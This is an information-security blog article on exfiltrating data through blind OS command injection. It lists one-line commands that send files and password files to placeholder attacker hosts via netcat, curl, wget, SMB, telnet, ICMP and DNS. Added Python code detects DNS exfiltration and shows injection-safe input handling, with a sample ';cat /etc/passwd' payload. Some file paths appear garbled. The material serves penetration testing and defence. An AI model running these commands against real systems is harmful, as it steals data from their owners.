Information Security 10 min read

Data Exfiltration Techniques via OS Command Injection Using Netcat, cURL, Wget, SMB, Telnet, ICMP and DNS

The article explains how OS command injection can be leveraged for blind data exfiltration and demonstrates practical techniques using tools such as Netcat, cURL, Wget, SMB, Telnet, ICMP and DNS, along with preventive measures to mitigate such vulnerabilities.

Architect

In penetration testing or CTF challenges, attackers often encounter applications that pass user‑provided text directly to system commands, creating OS command injection vulnerabilities. When input is not validated, an attacker can execute arbitrary commands on the target host.

The article first describes blind OS command injection, where no direct output is returned, and then outlines several practical exfiltration methods that do not require uploading a web shell.

Netcat: with a Netcat listener on the attacker machine writing to a file, e.g., nc -l -p {port} > {file/to/extract}, the victim redirects file contents to the listener; the Windows variant given is type {file to extract} | nc -L -p {port}.

cURL: files can be posted to a remote server with cat /path/to/file | curl -F ":data=@-" http://xxx.xxx.xxx.xxxx:xxxx/test.txt. The same tool can upload via FTP using curl -T {path to file} ftp://xxx.xxx.xxx.xxx --user {username}:{password}.

Wget: supports header injection and POST data. Examples include wget --header='EVIL:$(cat /datacret/password.txt)' http://xxx.xxx.xxx:xxx, wget --post-data exfil=`cat /datacretcretcode.txt` http://xxx.xxx.xxx.xxx:xxxx, and wget --post-file trophy.php http://xxx.xxx.xxx.xxx:xxxx.

SMB: establish a network share and copy files with net use h: \\xxx.xxx.xxx.xxx\web /user:{username} {password} && copy {File to Copy} h:\(unknown).txt.

Telnet: transfer a file to a listening host using telnet xxx.xxx.xxx.xxx {port} < {file to transfer}.

ICMP: when other tools are unavailable, data can be encoded in ICMP echo packets: cat password.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done. Captured packets can be reassembled with Wireshark.

DNS: each line of a file can be sent as a DNS query, e.g., cat /datacret/password.txt | while read exfil; do host $exfil.contextis.com 192.168.107.135; done, and the responses can be reconstructed into the original file.
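From the defender's side, the DNS and ICMP variants above leave a recognisable footprint: one query (or echo request) per chunk, with the leftmost DNS label carrying file content or, when piped through xxd -p as in the ICMP example, a run of hex characters. The following detection script is an added example, not code from the article; it runs over constructed BIND-style query log lines (the client addresses, the exfil-example.test domain and the hex labels are all made up) and flags a client that sends several queries with hex-looking, high-entropy or non-hostname labels under the same registrable domain.

```python
import math
import re
from collections import defaultdict

# Constructed BIND-style query log (not from the article). The 10.0.0.7 lines
# mimic a loop that sends one hex-encoded 15-byte chunk per query.
SAMPLE_LOG = """\
12-Mar-2024 10:01:02.101 client 10.0.0.5#51234: query: www.example.com IN A + (10.0.0.2)
12-Mar-2024 10:01:02.220 client 10.0.0.5#51235: query: mail.example.com IN MX + (10.0.0.2)
12-Mar-2024 10:01:03.004 client 10.0.0.7#40001: query: 726f6f743a783a303a303a726f6f74.exfil-example.test IN A + (10.0.0.2)
12-Mar-2024 10:01:03.110 client 10.0.0.7#40002: query: 3a2f726f6f743a2f62696e2f626173.exfil-example.test IN A + (10.0.0.2)
12-Mar-2024 10:01:03.215 client 10.0.0.7#40003: query: 680a6461656d6f6e3a783a313a313a.exfil-example.test IN A + (10.0.0.2)
12-Mar-2024 10:01:03.320 client 10.0.0.7#40004: query: 6461656d6f6e3a2f7573722f736269.exfil-example.test IN A + (10.0.0.2)
12-Mar-2024 10:01:04.000 client 10.0.0.9#33333: query: cdn.example.com IN AAAA + (10.0.0.2)
"""

# "client <ip>#<port>: query: <qname> IN <qtype>" is the part of a BIND query
# log line we need; the timestamp and flags are ignored.
LOG_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")
HEX_RE = re.compile(r"^[0-9a-f]{16,}$", re.IGNORECASE)
# Characters that never occur in a legitimate hostname label.
NON_HOSTNAME_RE = re.compile(r"[^A-Za-z0-9_-]")


def shannon_entropy(s):
    """Bits per character; hostname labels such as 'www' score low."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    """Return (client, qname, qtype) for every line the regex recognises."""
    out = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            out.append((m.group("client"), m.group("qname"), m.group("qtype")))
    return out


def base_domain(qname):
    # Assumption: last two labels are the registrable domain. A real deployment
    # would consult the public suffix list instead of this shortcut.
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def label_suspicious(label):
    """Hex-encoded chunk, unusually random text, or characters no hostname has."""
    if HEX_RE.match(label):
        return True
    if NON_HOSTNAME_RE.search(label):
        return True
    return len(label) >= 20 and shannon_entropy(label) > 3.5


def detect_dns_exfil(text, min_queries=3):
    """Map (client, base_domain) -> number of suspicious queries, for pairs at
    or above min_queries. A single odd label is noise; a stream of them is not."""
    counts = defaultdict(int)
    for client, qname, _qtype in parse_log(text):
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:
            continue  # bare registrable domain: no payload label to inspect
        if any(label_suspicious(lbl) for lbl in labels[:-2]):
            counts[(client, base_domain(qname))] += 1
    return {k: v for k, v in counts.items() if v >= min_queries}


if __name__ == "__main__":
    for (client, domain), n in detect_dns_exfil(SAMPLE_LOG).items():
        print(f"{client} sent {n} suspicious queries under {domain}")
```

Run it over a real query log with a threshold tuned to the environment; the per-client, per-domain grouping is what separates a chunked transfer from the occasional long CDN or anti-spam label, and the same hex-chunk heuristic applies to ICMP echo payloads extracted from a packet capture.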

The article concludes with defensive recommendations: avoid using user input as command arguments, whitelist valid inputs, perform regular code reviews and penetration tests, remove unnecessary tools (cURL, Wget, Netcat), run services with least‑privilege accounts, audit logs frequently, and enforce internal network traffic controls.
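The first two recommendations, not passing user input to a shell and whitelisting what is accepted, are easiest to see side by side in code. The example below is added here and is not from the article; it assumes a hypothetical web feature that lets a user ping a host, the classic shape of the vulnerability the article describes. The unsafe variant splices the input into a shell string (returned rather than executed, for comparison only); the hardened variant accepts only a syntactically valid IP address or hostname and passes it as a separate argv element with shell=False, so shell metacharacters have no meaning even if validation were ever loosened.

```python
import ipaddress
import re
import subprocess

# RFC-1123-style hostname: labels of letters, digits and hyphens, 1-63 chars
# each, no leading or trailing hyphen, total length at most 253.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)
# Characters the shell treats specially; useful for logging rejected input.
SHELL_META = set(";|&`$()<>\n\\'\"")


def unsafe_ping_command(user_input):
    """VULNERABLE pattern (shown, not executed): user text becomes part of a
    command line that would be handed to subprocess.run(..., shell=True)."""
    return f"ping -c 1 {user_input}"


def is_valid_target(user_input):
    """Allowlist: accept only an IP literal or a well-formed hostname."""
    try:
        ipaddress.ip_address(user_input)
        return True
    except ValueError:
        pass
    return bool(HOSTNAME_RE.match(user_input))


def looks_like_injection(user_input):
    """True if the rejected input contained shell metacharacters; lets the
    application log an injection attempt rather than a generic bad request."""
    return any(ch in SHELL_META for ch in user_input)


def safe_ping_argv(user_input):
    """Build the argument vector for the hardened call. Raises ValueError on
    anything outside the allowlist; never builds a shell string."""
    if not is_valid_target(user_input):
        raise ValueError(f"rejected target: {user_input!r}")
    return ["ping", "-c", "1", user_input]


def run_ping(user_input, timeout=10):
    """Hardened execution: argv list, shell=False, bounded runtime."""
    argv = safe_ping_argv(user_input)
    return subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=timeout)


if __name__ == "__main__":
    # Constructed inputs: one legitimate, one carrying an injection payload.
    for candidate in ("example.com", "10.0.0.1; cat /etc/passwd"):
        print(f"unsafe string: {unsafe_ping_command(candidate)!r}")
        try:
            print(f"hardened argv: {safe_ping_argv(candidate)}")
        except ValueError as err:
            tag = " (shell metacharacters present)" if looks_like_injection(candidate) else ""
            print(f"hardened: {err}{tag}")
```

The point of returning an argv list is that the operating system receives the target as one opaque argument; the validation is the first line of defence, the absence of a shell is the second, and the least-privilege service account the article recommends limits what a bypass of both could read.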

Tags: DNS, cURL, ICMP, OS command injection, data exfiltration, Netcat, Wget
Written by Architect

Professional architect sharing high‑quality architecture insights. Topics include high‑availability, high‑performance, high‑stability architectures, big data, machine learning, Java, system and distributed architecture, AI, and practical large‑scale architecture case studies. Open to ideas‑driven architects who enjoy sharing and learning.
